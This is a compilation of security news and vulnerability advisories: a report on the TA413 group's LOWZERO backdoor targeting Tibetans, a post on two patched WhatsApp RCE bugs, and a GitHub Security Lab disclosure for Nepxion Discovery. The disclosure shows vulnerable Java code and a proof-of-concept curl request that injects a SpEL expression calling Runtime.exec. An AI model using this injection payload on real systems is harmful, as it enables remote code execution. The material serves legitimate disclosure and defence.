TA413, also known as LuckyCat, has been linked to relentlessly targeting organizations and individuals associated with the Tibetan community at least since 2020 using malware such as ExileRAT, Sepulcher, and a malicious Mozilla Firefox browser extension dubbed FriarFox.

The group's exploitation of the Follina flaw was previously highlighted by Proofpoint in June 2022, although the ultimate end goal of the infection chains remained unclear.

Also put to use in a spear-phishing attack identified in May 2022 is a malicious RTF document that exploited flaws in Microsoft Equation Editor to drop the custom LOWZERO implant. This is achieved by employing a Royal Road RTF weaponizer tool, which is widely shared among Chinese threat actors.

In another phishing email sent to a Tibetan target in late May, a Microsoft Word attachment hosted on the Google Firebase service attempted to leverage the Follina vulnerability to execute a PowerShell command designed to download the backdoor from a remote server.

LOWZERO, the backdoor, is capable of receiving additional modules from its command-and-control (C2) server, but only on the condition that the compromised machine is deemed to be of interest to the threat actor.

"The group continues to incorporate new capabilities while also relying on tried-and-tested \[tactics, techniques, and procedures," the cybersecurity firm said.

"TA413's adoption of both zero-day and recently published vulnerabilities is indicative of wider trends with Chinese cyber-espionage groups whereby exploits regularly appear in use by multiple distinct Chinese activity groups prior to their widespread public availability."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Espionage Hackers Target Tibetans Using New LOWZERO Backdoor

Categories: Exploits and vulnerabilities
Categories: News
Tags: WhatsApp

Tags:  CVE-2022-36934

Tags:  CVE-2022-27492

Two RCE vulnerabilities were patched in WhatsApp. Both vulnerabilities were video related and could be used to compromise your device.



(Read more...)




The post Critical WhatsApp vulnerabilities patched: Check you've updated! appeared first on Malwarebytes Labs.

Posted: September 26, 2022 by

WhatsApp has fixed two remote code execution vulnerabilities in its September update, according to its security advisory. These could have allowed an attacker to remotely access a device and execute commands from afar.

These versions of WhatsApp are affected by at least one of the vulnerabilities:

*   WhatsApp for Android prior to v2.22.16.12
*   WhatsApp Business for Android prior to v2.22.16.12
*   WhatsApp for iOS prior to v2.22.16.12
*   WhatsApp Business for iOS prior to v2.22.16.12

WhatsApp for Android prior to v2.22.16.2 and WhatsApp for iOS v2.22.15.9 are affected by both.

**How to make sure you're protected**

There are no indications that these vulnerabilities have already been exploited. The vulnerabilities were found by the WhatsApp internal security team and silently fixed, so there is a good chance that your WhatsApp has already been updated. However, it never hurts to check.

_Note: the methods described below may be slightly different based on the brand, type, and model of your phone, but should give you a good general idea of where to look._

If you have an iPhone, go to the App Store and tap **Updates**. When you find WhatsApp, tap the **Update** button next to the app. Your phone should then start installing the update.

If you own an Android phone, click on Play Store, then on the menu button. Under **My apps and games**, tap **Update** next to WhatsApp Messenger.

Stay safe, everyone!

**Technical details**

CVE-2022-36934: An integer overflow in WhatsApp could result in remote code execution (RCE) in an established video call. An integer overflow occurs when an integer value gets assigned a value that is too large to store in the reserved representation that can be represented with a given number of digits. Usually this will be higher than the maximum, but it can also be lower than the minimum representable value. By writing a larger value into the memory an attacker could overwrite other parts of the systems memory and abuse that ability to remotely execute code.

This RCE bug affects a piece of code in the WhatsApp component Video Call Handler, which allows an attacker to manipulate the bug to trigger a heap-based buffer overflow and take complete control of WhatsApp Messenger. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.

The heap is an area of memory made available use by the program. The program can request blocks of memory for its use within the heap. In order to allocate a block of some size, the program makes an explicit request by calling the heap allocation operation.

CVE-2022-27492: An integer underflow in WhatsApp could have caused remote code execution when receiving a crafted video file. Integer underflow errors are usually errors that occur when a number that should always be positive gets assigned a negative value. A perfect example of an integer underflow error is when array index errors are used with a negative value. This type of weakness will lead to undefined behavior and often crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high.

This RCE bug affects an unspecified code block of the component Video File Handler. The manipulation with an unknown input leads to a memory corruption vulnerability. To exploit this vulnerability, attackers would have to drop a crafted video file on the user’s WhatsApp messenger and convince the user to play it.

**RELATED ARTICLES**

Critical WhatsApp vulnerabilities patched: Check you've updated!

Nepxion Discovery is a solution for Spring Cloud. Discovery is vulnerable to SpEL Injection in discovery-commons. DiscoveryExpressionResolver’s eval method is evaluating expression with a StandardEvaluationContext, allowing the expression to reach and interact with Java classes such as java.lang.Runtime, leading to Remote Code Execution. There is no patch available for this issue at time of publication. There are no known workarounds.

**Nepxion Discovery vulnerable to SpEL Injection leading to Remote Code Execution**

Critical severity GitHub Reviewed Published Sep 25, 2022 • Updated Sep 28, 2022

GHSA-q979-9m39-23mq: Nepxion Discovery vulnerable to SpEL Injection leading to Remote Code Execution

Nepxion Discovery is a solution for Spring Cloud. Discovery is vulnerable to a potential Server-Side Request Forgery (SSRF). RouterResourceImpl uses RestTemplate’s getForEntity to retrieve the contents of a URL containing user-controlled input, potentially resulting in Information Disclosure. There is no patch available for this issue at time of publication. There are no known workarounds.

**Coordinated Disclosure Timeline**

*   2022/05/22: Report sent to nepxion@qq.com
*   2022/06/12: Asked for a security contact to 1394997@qq.com
*   2022/06/20: Opened a public issue
*   2022/08/09: Maintainer closes the public issue
*   2022/08/21: Deadline expired
*   2022/09/06: CVE-2022-23463 and CVE-2022-23464 assigned

**Summary**

Nepxion/Discovery is vulnerable to SpEL Injection in discovery-commons and a potential SSRF in discovery-plugin-admin-center.

**Product**

Discovery

**Tested Version**

9f3e7a5

**Details****Issue 1: SpEL Injection in discovery-commons (GHSL-2022-033)**

DiscoveryExpressionResolver’s eval method is evaluating expression with a StandardEvaluationContext, allowing the expression to reach and interact with Java classes such as java.lang.Runtime, leading to Remote Code Execution. There are two endpoints (here and here) taking user input into expression.

For instance, StrategyEndpoint exposes a /strategy/validate-expression endpoint whose expression parameter flows to strategyResource.validateExpression in \[1\].

StrategyEndpoint.java

    @RestController
    @RequestMapping(path = "/strategy")
    ...
    public class StrategyEndpoint {
        @Autowired
        private StrategyResource strategyResource;
    
        @RequestMapping(path = "/validate-expression", method = RequestMethod.GET)
        ...
        public ResponseEntity<?> validateExpression(@RequestParam @ApiParam(value = "...", defaultValue = "...", required = true) String expression, @RequestParam(defaultValue = "", required = false) @ApiParam(value = "...", defaultValue = "a=1;b=1") String validation) {
            return doValidateExpression(expression, validation);
        }
    
        private ResponseEntity<?> doValidateExpression(String expression, String validation) {
            try {
                boolean result = strategyResource.validateExpression(expression, validation); // 1
    
                return ResponseUtil.getSuccessResponse(result);
            } catch (Exception e) {
                return ResponseUtil.getFailureResponse(e);
            }
        }
    }
    

StrategyResource builds a Map with the validation parameter, but leaves expression intact, ultimately flowing to DiscoveryExpressionResolver.eval in \[2\].

StrategyResource.java

    public class StrategyResourceImpl implements StrategyResource {
        private TypeComparator typeComparator = new DiscoveryTypeComparor();
    
        @Override
        public boolean validateExpression(String expression, String validation) {
            Map<String, String> map = null;
            try {
                map = StringUtil.splitToMap(validation);
            } catch (Exception e) {
                throw new DiscoveryException("Invalid format for validation input");
            }
    
            return DiscoveryExpressionResolver.eval(expression, DiscoveryConstant.EXPRESSION_PREFIX, map, typeComparator); // 2
        }
    }
    

In DiscoveryExpressionResolver, the first eval method leaves, again, the expression parameter intact (in \[3\]) flowing to the second eval method, where expression gets evaluated using the vulnerable StandardEvaluationContext (\[2\]) in \[4\].

DiscoveryExpressionResolver.java

    public class DiscoveryExpressionResolver {
        private static final ExpressionParser EXPRESSION_PARSER = new SpelExpressionParser(); // 1
    
        public static boolean eval(String expression, String key, Map<String, String> map, TypeComparator typeComparator) {
            StandardEvaluationContext context = new StandardEvaluationContext(); // 2
            context.setTypeComparator(typeComparator);
            if (map != null) {
                context.setVariable(key, map);
            } else {
                context.setVariable(key, new HashMap<String, String>());
            }
    
            return eval(expression, context); // 3
        }
    
        public static boolean eval(String expression, StandardEvaluationContext context) {
            try {
                Boolean result = EXPRESSION_PARSER.parseExpression(expression).getValue(context, Boolean.class); // 4
    
                return result != null ? result.booleanValue() : false;
            } catch (Exception e) {
                return false;
            }
        }
    }
    

**Impact**

This issue may lead to Remote Code Execution.

**Remediation**

Use SimpleEvaluationContext to exclude _references to Java types, constructors, and bean references_.

**Resources****POC**

    $ curl '127.0.0.1:9628/strategy/validate-expression?expression=T%28java.lang.Runtime%29.getRuntime%28%29.exec%28%27touch%20/tmp/vulnz%27%29&validation=a%3dtest'
    $ ls -al /tmp/ | grep vulnz
    

**Issue 2: Potential SSRF in discovery-plugin-admin-center (GHSL-2022-034)**

RouterResourceImpl uses RestTemplate’s getForEntity \[2\] to retrieve the contents of a URL containing user-controlled input \[1\] from this endpoint.

RouterResourceImpl.java

    public List<RouterEntity> getRouterEntityList(String routeServiceId, String routeProtocol, String routeHost, int routePort, String routeContextPath) {
            String url = routeProtocol + "://" + routeHost + ":" + routePort + routeContextPath + "router/route/" + routeServiceId; // 1
    
            String result = null;
            try {
                result = routerRestTemplate.getForEntity(url, String.class).getBody(); // 2
            } catch (RestClientException e) {
                throw new DiscoveryException("Failed to execute to route, serviceId=" + routeServiceId + ", url=" + url, e);
            }
    
            if (StringUtils.isEmpty(result)) {
                return null;
            }
    
            List<RouterEntity> routerEntityList = JsonUtil.fromJson(result, new TypeReference<List<RouterEntity>>() {
            });
    
            return routerEntityList;
        }
    

**Impact**

This issue may lead to Information Disclosure.

*   CVE-2022-23463
*   CVE-2022-23464

**Credit**

These issues were discovered and reported by GHSL team member @jorgectf (Jorge Rosillo).

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-033 or GHSL-2022-034 in any communication regarding these issues.

Tag

#rce